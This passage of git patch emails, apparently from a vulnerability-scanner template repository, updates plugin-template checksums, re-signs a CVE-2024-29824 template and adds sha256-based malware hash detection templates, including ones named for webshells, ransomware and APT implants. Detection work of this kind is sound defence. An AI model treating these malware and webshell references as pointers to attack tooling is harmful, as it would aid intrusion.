+http/technologies/wordpress/plugins/popup-maker.yaml:9eaff8ba61bc440e2a910978d82b249b24a414fd +http/technologies/wordpress/plugins/post-smtp.yaml:1c2878edf00b8fac085645a598a7a1ecffc4ab39 +http/technologies/wordpress/plugins/post-types-order.yaml:44506ddff45316c705c79de3bff9a676a898b5ba +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:3b06f383e4591aa060ca623c75a37b2211c3033f +http/technologies/wordpress/plugins/pretty-link.yaml:05a6fd60d175d54771949014dbd19192863e8ffe +http/technologies/wordpress/plugins/really-simple-captcha.yaml:bae8a7bc8c145896971f90443b406163104e50aa +http/technologies/wordpress/plugins/really-simple-ssl.yaml:a711785caf3c789514413b4db081e00a2fae6fff +http/technologies/wordpress/plugins/redirection.yaml:c1e5368883d41263708604766c5d56a0ec531658 +http/technologies/wordpress/plugins/redux-framework.yaml:f7fda23a3dabe0a56690e0a03d382c1923223e56 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:fe311101fee6dc76d1c0a978ffb4153a71b357e4 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:78eea177e05dd571511cf91b6c3bcb0ed5ea6f97 +http/technologies/wordpress/plugins/safe-svg.yaml:c83bb265024a507a993e338adb47ac5d1a295cf8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d342042a18db5fa9ee461a1e9219d69693d96051 +http/technologies/wordpress/plugins/sg-cachepress.yaml:9cabe023bc8f61a4bc98956e298014115610fcea +http/technologies/wordpress/plugins/sg-security.yaml:f3071315a523bcb301ef5ad1e5d14d07b618e186 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:14cfcf62797406eac7de01b257bd51a3a30bf617 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:b3b2ac91a37a7396296203135efeb1ad7ae59e5a +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:82f10cabc337c43f00dc675e57ec60c4c61d8f78 +http/technologies/wordpress/plugins/simple-history.yaml:ffa667dcbbf704bdfb68637927adc4c9feda2304 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 +http/technologies/wordpress/plugins/siteguard.yaml:5061bdcb48c25635ad2b728563b80ac7e7a0728f +http/technologies/wordpress/plugins/siteorigin-panels.yaml:fe5e021742f4bc42edf23aa83af4668552417859 +http/technologies/wordpress/plugins/smart-slider-3.yaml:c0c8ca22b9c64f66afd2d2207edccff78c5a73eb +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:3834d44240b0e12b0e235ff4e48ff41d84daf5f0 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:6468348403f1d0957f4c8561c87aa7382e84d37c +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:860a74c72636b40fa0f9c92bf7e5fc8c09ccef04 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:4a817eaa32a3e0441000d7aaa6880b03e809da3d +http/technologies/wordpress/plugins/svg-support.yaml:f0289375c36b41dd68cd75f83fed6f026fd0e5d5 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:47d62b2456fd6145bc8083ab77e5d2747dffad53 +http/technologies/wordpress/plugins/tablepress.yaml:5efc02644c300bb5f1c51a25fb52587ebdcf4578 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:f4cf7e99f81ef91846cb41bf5595660ef5b0f101 +http/technologies/wordpress/plugins/templately.yaml:fae0d8a501d71a9679ddd3627a43d3e032677ed6 +http/technologies/wordpress/plugins/the-events-calendar.yaml:fa7a7c19a8a49d4b4499691b0cd5a7c71f455da5 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:53f169bf5734c3164dadb18902e0780446432e9b +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:26e315b3668efea3ba398eebc7b4316c6239ae1a +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:4549af5cb6a1d847347082e3f5f0a5d3baa34e7f +http/technologies/wordpress/plugins/under-construction-page.yaml:3a1c7515d2576ad8114bdfa32971b5c2fa751a87 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e +http/technologies/wordpress/plugins/updraftplus.yaml:db9635ae16ddb9be233442315e812adf407676af http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/user-role-editor.yaml:34d232cd5fd4f3f753dede57cf7cc2906d8889ea http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/w3-total-cache.yaml:261f9e1d18f372d069e74904dfe115551ecaa453 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:109855cab0944c456dc8c0618da56b4d363e0329 +http/technologies/wordpress/plugins/webp-express.yaml:067a382f3bb0982d8400aa22f3ae4b618358665e +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:4ffbc50b018217f155d34a1b093f04bf6a309c21 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:56b88d4f2bd2fb0fbd179f1ad3e23c613b03b31c +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:99a0d9ead34f56f5293ab4b0f64e1f4c77d2abcb +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:051215cfbd927b650d91f69f115356aa49614f31 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:37d322ccffdd3846de43647ecdefc0310678f0ce +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:04a18829e5e28c5ffa8a1d75fcef72ca7ca67f58 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:e69342528665a6f3096325f9cf798d63eddf00b1 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:2bf58f445a9a1fbd170ec6f525c270abf9a2f83c +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:f31832eca1ad6654102f23af301f351a4fef8b67 +http/technologies/wordpress/plugins/woocommerce-services.yaml:f60ddcf655e23f3b7eb2774260a236d2926b9747 +http/technologies/wordpress/plugins/woocommerce.yaml:7942c6d93bab0ec829cda0912ee47db6d33a8616 +http/technologies/wordpress/plugins/wordfence.yaml:0089b3189c8ffce46af7d7f8ff1035c8edd8ca48 +http/technologies/wordpress/plugins/wordpress-importer.yaml:801b125fc53ddf6b96cbd3b1df87bb2907744098 +http/technologies/wordpress/plugins/wordpress-seo.yaml:eb5026c81a058c8e23fd4a658d31155191ec4758 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d -http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 -http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/worker.yaml:65b582e4e00f2bf2ed0bb52ab2aa5fdb71fe6597 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c90bcd3af3fa0fd98ebfbfde8a95362c4f739791 +http/technologies/wordpress/plugins/wp-file-manager.yaml:c781f4c1a21178dc589059e118505d5af7970ec5 +http/technologies/wordpress/plugins/wp-google-maps.yaml:1ba64792eb5565317bbdaf15cea334d528827533 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f7e4257fd219d962f65fa95901844dc2e4ed4520 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:a6964e29cfb805ec40fd86ae63a57471791126b0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:b42ff142d3ed3e453bfa90c9b7063a2f04593a31 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:2cf6c3dabdae20b41086e76f818c928696b2065e +http/technologies/wordpress/plugins/wp-optimize.yaml:d8e49f27596eadd0b87023a358da901609dce662 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:0c0837ee92e5f3673861bec53d03cdc6f27aa9b6 +http/technologies/wordpress/plugins/wp-reset.yaml:3ae2f0c45852203ba143244a199103eec6f98324 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cbc4303e8120d75606d1a64211236fa07bb80267 +http/technologies/wordpress/plugins/wp-rollback.yaml:80f97177b615808591f6e3925b981e7c621a492c +http/technologies/wordpress/plugins/wp-seopress.yaml:ec0686a578ec2a6ba35e17e8ab8ab36e109bc977 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:0e0ef25523d5fabd71ba0bbcd313d64f693b44ff +http/technologies/wordpress/plugins/wp-smushit.yaml:d83af0f099eaaa90dd9de6d1b4f0b6383a11bf23 +http/technologies/wordpress/plugins/wp-statistics.yaml:a02012c13b64761d5b7ae0aa12422605a9e263c1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:38468e88395a2899b4238c563ab72236df89df77 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:af011cb4f4b4375f67df798132223751fc677645 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ec7984e71fd0405d9cd03ae12e797ed1f9a0689b +http/technologies/wordpress/plugins/wpforms-lite.yaml:c60e5fca923e4bf24d8cb12174d4bb558007f0b9 +http/technologies/wordpress/plugins/wps-hide-login.yaml:c50453b091bb34854f9f3881771a880dfac3c254 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:3d5aa172de9d8c66dc944edb203b79b7db76f810 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b4e0bb08d114c5e17f2cb00b0b44e280c51a7c6c http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8686,7 +8686,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cc5ddd9ab13a588c19a47002705cacbfa793369a +templates-checksum.txt:03570ee1d7c17eb57fa661e7af634577289fd1a8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From acaacdf2d64054ac786cc946705612888ab93f66 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 09:30:15 +0000 Subject: [PATCH 0447/1841] Auto Template Signing [Thu Jun 20 09:30:15 UTC 2024] :robot: --- http/cves/2024/CVE-2024-29824.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index 91324f5ea9..4927332657 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e7923b00ef9ead9d19fb59cc891e3b7ac1d6e0568ded82cb74735024bcf13bc022057ef188392633662d73cde6703d2ec9dffe733b7c63f613e303c7ec3ce0e204a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d84da116a277ed9833fc747a1c135c6366cde3aadf2d270b957064c59679589902202205108a6149c74c7760992f3fea37504cea6e77358a9c4796017f70b7d30384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 11cdad400290d8c4c73753bc01610ed268594351 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:12:34 +0530 Subject: [PATCH 0448/1841] New - Templates --- .../hash/anthem-deeppanda-malware-hash.yaml | 21 +++++++++ ...lware.yaml => applejeus-malware-hash.yaml} | 4 +- ...alware.yaml => avburner-malware-hash.yaml} | 4 +- ...alware.yaml => backwash-malware-hash.yaml} | 7 +-- .../hash/blackenergy-driver-amdide-hash.yaml | 24 ++++++++++ .../hash/blackenergy-driver-malware-hash.yaml | 26 +++++++++++ .../blackenergy-killdisk-malware-hash.yaml | 22 +++++++++ .../hash/blackenergy-ssh-malware-hash.yaml | 18 ++++++++ .../hash/blackenergy-vbs-malware-hash.yaml | 20 +++++++++ ...lware.yaml => bluelight-malware-hash.yaml} | 4 +- .../hash/bluetermite-emdivi-malware-hash.yaml | 33 ++++++++++++++ .../hash/bluetermite-emdivi-sfx-hash.yaml | 20 +++++++++ ...yaml => charmingcypress-malware-hash.yaml} | 6 +-- .../hash/cheshirecat-malware-hash.yaml | 22 +++++++++ file/malware/hash/cloudduke-malware-hash.yaml | 33 ++++++++++++++ file/malware/hash/codoso-gh0st-malware.yaml | 22 +++++++++ file/malware/hash/codoso-malware-hash.yaml | 26 +++++++++++ .../malware/hash/codoso-pgv-malware-hash.yaml | 23 ++++++++++ .../hash/codoso-plugx-malware-hash.yaml | 24 ++++++++++ ...lware.yaml => disgomoji-malware-hash.yaml} | 6 +-- file/malware/hash/dubnium-malware-hash.yaml | 43 ++++++++++++++++++ .../hash/dubnium-sshopenssl-malware-hash.yaml | 25 +++++++++++ file/malware/hash/emissary-malware-hash.yaml | 32 +++++++++++++ ...ware.yaml => evilbamboo-malware-hash.yaml} | 4 +- file/malware/hash/fakem-malware-hash.yaml | 30 +++++++++++++ ...alware.yaml => flipflop-malware-hash.yaml} | 4 +- file/malware/hash/furtim-malware-hash.yaml | 22 +++++++++ ...malware.yaml => gimmick-malware-hash.yaml} | 4 +- ...shell.yaml => godzilla-webshell-hash.yaml} | 4 +- file/malware/hash/greenbug-malware-hash.yaml | 32 +++++++++++++ ...ico-malware.yaml => ico-malware-hash.yaml} | 6 +-- .../hash/industroyer-malware-hash.yaml | 28 ++++++++++++ .../hash/ironPanda-htran-malware-hash.yaml | 21 +++++++++ .../ironpanda-dnstunclient-malware-hash.yaml | 21 +++++++++ file/malware/hash/ironpanda-malware-hash.yaml | 22 +++++++++ file/malware/hash/locky-ransomware-hash.yaml | 21 +++++++++ .../minidionis-readerview-malware-hash.yaml | 26 +++++++++++ .../hash/minidionis-vbs-malware-hash.yaml | 19 ++++++++ .../malware/hash/naikon-apt-malware-hash.yaml | 19 ++++++++ file/malware/hash/neuron2-malware-hash.yaml | 20 +++++++++ file/malware/hash/oilrig-malware-hash.yaml | 45 +++++++++++++++++++ .../hash/passcv-ntscan-malware-hash.yaml | 19 ++++++++ .../hash/passcv-sabre-malware-hash.yaml | 29 ++++++++++++ .../hash/passcv-signingcert-malware-hash.yaml | 21 +++++++++ file/malware/hash/petya-ransomware-hash.yaml | 19 ++++++++ .../poseidongroup-maldoc-malware-hash.yaml | 27 +++++++++++ .../hash/poseidongroup-malware-hash.yaml | 26 +++++++++++ ...lware.yaml => powerstar-malware-hash.yaml} | 4 +- .../malware/hash/purplewave-malware-hash.yaml | 27 +++++++++++ .../malware/hash/red-leaves-malware-hash.yaml | 21 +++++++++ ...bshell.yaml => regeorg-webshell-hash.yaml} | 4 +- file/malware/hash/revil-ransomware-hash.yaml | 22 +++++++++ file/malware/hash/rokrat-malware-hash.yaml | 20 +++++++++ file/malware/hash/rokrat-malware.yaml | 22 --------- file/malware/hash/sauron-malware-hash.yaml | 26 +++++++++++ file/malware/hash/seaduke-malware-hash.yaml | 19 ++++++++ file/malware/hash/sfx1-malware-hash.yaml | 21 +++++++++ .../hash/sfxrar-acrotray-malware-hash.yaml | 21 +++++++++ ...alware.yaml => sharpext-malware-hash.yaml} | 4 +- .../hash/sofacy-Winexe-malware-hash.yaml | 20 +++++++++ .../hash/sofacy-bundestag-malware-hash.yaml | 22 +++++++++ .../hash/sofacy-fybis-malware-hash.yaml | 21 +++++++++ file/malware/hash/tidepool-malware-hash.yaml | 24 ++++++++++ file/malware/hash/turla-malware-hash.yaml | 29 ++++++++++++ file/malware/hash/unit78020-malware-hash.yaml | 26 +++++++++++ .../hash/wildneutron-malware-hash.yaml | 31 +++++++++++++ 66 files changed, 1284 insertions(+), 54 deletions(-) create mode 100644 file/malware/hash/anthem-deeppanda-malware-hash.yaml rename file/malware/hash/{applejeus-malware.yaml => applejeus-malware-hash.yaml} (90%) rename file/malware/hash/{avburner-malware.yaml => avburner-malware-hash.yaml} (82%) rename file/malware/hash/{backwash-malware.yaml => backwash-malware-hash.yaml} (88%) create mode 100644 file/malware/hash/blackenergy-driver-amdide-hash.yaml create mode 100644 file/malware/hash/blackenergy-driver-malware-hash.yaml create mode 100644 file/malware/hash/blackenergy-killdisk-malware-hash.yaml create mode 100644 file/malware/hash/blackenergy-ssh-malware-hash.yaml create mode 100644 file/malware/hash/blackenergy-vbs-malware-hash.yaml rename file/malware/hash/{bluelight-malware.yaml => bluelight-malware-hash.yaml} (88%) create mode 100644 file/malware/hash/bluetermite-emdivi-malware-hash.yaml create mode 100644 file/malware/hash/bluetermite-emdivi-sfx-hash.yaml rename file/malware/hash/{charmingcypress-malware.yaml => charmingcypress-malware-hash.yaml} (69%) create mode 100644 file/malware/hash/cheshirecat-malware-hash.yaml create mode 100644 file/malware/hash/cloudduke-malware-hash.yaml create mode 100644 file/malware/hash/codoso-gh0st-malware.yaml create mode 100644 file/malware/hash/codoso-malware-hash.yaml create mode 100644 file/malware/hash/codoso-pgv-malware-hash.yaml create mode 100644 file/malware/hash/codoso-plugx-malware-hash.yaml rename file/malware/hash/{disgomoji-malware.yaml => disgomoji-malware-hash.yaml} (75%) create mode 100644 file/malware/hash/dubnium-malware-hash.yaml create mode 100644 file/malware/hash/dubnium-sshopenssl-malware-hash.yaml create mode 100644 file/malware/hash/emissary-malware-hash.yaml rename file/malware/hash/{evilbamboo-malware.yaml => evilbamboo-malware-hash.yaml} (96%) create mode 100644 file/malware/hash/fakem-malware-hash.yaml rename file/malware/hash/{flipflop-malware.yaml => flipflop-malware-hash.yaml} (90%) create mode 100644 file/malware/hash/furtim-malware-hash.yaml rename file/malware/hash/{gimmick-malware.yaml => gimmick-malware-hash.yaml} (80%) rename file/malware/hash/{godzilla-webshell.yaml => godzilla-webshell-hash.yaml} (84%) create mode 100644 file/malware/hash/greenbug-malware-hash.yaml rename file/malware/hash/{ico-malware.yaml => ico-malware-hash.yaml} (92%) create mode 100644 file/malware/hash/industroyer-malware-hash.yaml create mode 100644 file/malware/hash/ironPanda-htran-malware-hash.yaml create mode 100644 file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml create mode 100644 file/malware/hash/ironpanda-malware-hash.yaml create mode 100644 file/malware/hash/locky-ransomware-hash.yaml create mode 100644 file/malware/hash/minidionis-readerview-malware-hash.yaml create mode 100644 file/malware/hash/minidionis-vbs-malware-hash.yaml create mode 100644 file/malware/hash/naikon-apt-malware-hash.yaml create mode 100644 file/malware/hash/neuron2-malware-hash.yaml create mode 100644 file/malware/hash/oilrig-malware-hash.yaml create mode 100644 file/malware/hash/passcv-ntscan-malware-hash.yaml create mode 100644 file/malware/hash/passcv-sabre-malware-hash.yaml create mode 100644 file/malware/hash/passcv-signingcert-malware-hash.yaml create mode 100644 file/malware/hash/petya-ransomware-hash.yaml create mode 100644 file/malware/hash/poseidongroup-maldoc-malware-hash.yaml create mode 100644 file/malware/hash/poseidongroup-malware-hash.yaml rename file/malware/hash/{powerstar-malware.yaml => powerstar-malware-hash.yaml} (89%) create mode 100644 file/malware/hash/purplewave-malware-hash.yaml create mode 100644 file/malware/hash/red-leaves-malware-hash.yaml rename file/malware/hash/{regeorg-webshell.yaml => regeorg-webshell-hash.yaml} (89%) create mode 100644 file/malware/hash/revil-ransomware-hash.yaml create mode 100644 file/malware/hash/rokrat-malware-hash.yaml delete mode 100644 file/malware/hash/rokrat-malware.yaml create mode 100644 file/malware/hash/sauron-malware-hash.yaml create mode 100644 file/malware/hash/seaduke-malware-hash.yaml create mode 100644 file/malware/hash/sfx1-malware-hash.yaml create mode 100644 file/malware/hash/sfxrar-acrotray-malware-hash.yaml rename file/malware/hash/{sharpext-malware.yaml => sharpext-malware-hash.yaml} (89%) create mode 100644 file/malware/hash/sofacy-Winexe-malware-hash.yaml create mode 100644 file/malware/hash/sofacy-bundestag-malware-hash.yaml create mode 100644 file/malware/hash/sofacy-fybis-malware-hash.yaml create mode 100644 file/malware/hash/tidepool-malware-hash.yaml create mode 100644 file/malware/hash/turla-malware-hash.yaml create mode 100644 file/malware/hash/unit78020-malware-hash.yaml create mode 100644 file/malware/hash/wildneutron-malware-hash.yaml diff --git a/file/malware/hash/anthem-deeppanda-malware-hash.yaml b/file/malware/hash/anthem-deeppanda-malware-hash.yaml new file mode 100644 index 0000000000..bda4cb8072 --- /dev/null +++ b/file/malware/hash/anthem-deeppanda-malware-hash.yaml @@ -0,0 +1,21 @@ +id: anthem-deeppanda-malware-hash +info: + name: Anthem DeepPanda Trojan Kakfum Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_DeepPanda_Anthem.yar + tags: malware,deeppanda + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2'" + - "sha256(raw) == 'c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f'" + condition: or diff --git a/file/malware/hash/applejeus-malware.yaml b/file/malware/hash/applejeus-malware-hash.yaml similarity index 90% rename from file/malware/hash/applejeus-malware.yaml rename to file/malware/hash/applejeus-malware-hash.yaml index 28ea397f81..264e79f7ca 100644 --- a/file/malware/hash/applejeus-malware.yaml +++ b/file/malware/hash/applejeus-malware-hash.yaml @@ -1,6 +1,6 @@ -id: applejeus-malware +id: applejeus-malware-hash info: - name: AppleJeus Malware - Detect + name: AppleJeus Malware Hash - Detect author: pussycat0x severity: info description: Detects AppleJeus DLL samples diff --git a/file/malware/hash/avburner-malware.yaml b/file/malware/hash/avburner-malware-hash.yaml similarity index 82% rename from file/malware/hash/avburner-malware.yaml rename to file/malware/hash/avburner-malware-hash.yaml index 6940444fbb..eb752d4cc3 100644 --- a/file/malware/hash/avburner-malware.yaml +++ b/file/malware/hash/avburner-malware-hash.yaml @@ -1,6 +1,6 @@ -id: avburner-malware +id: avburner-malware-hash info: - name: AVBurner Malware - Detect + name: AVBurner Malware Hash - Detect author: pussycat0x 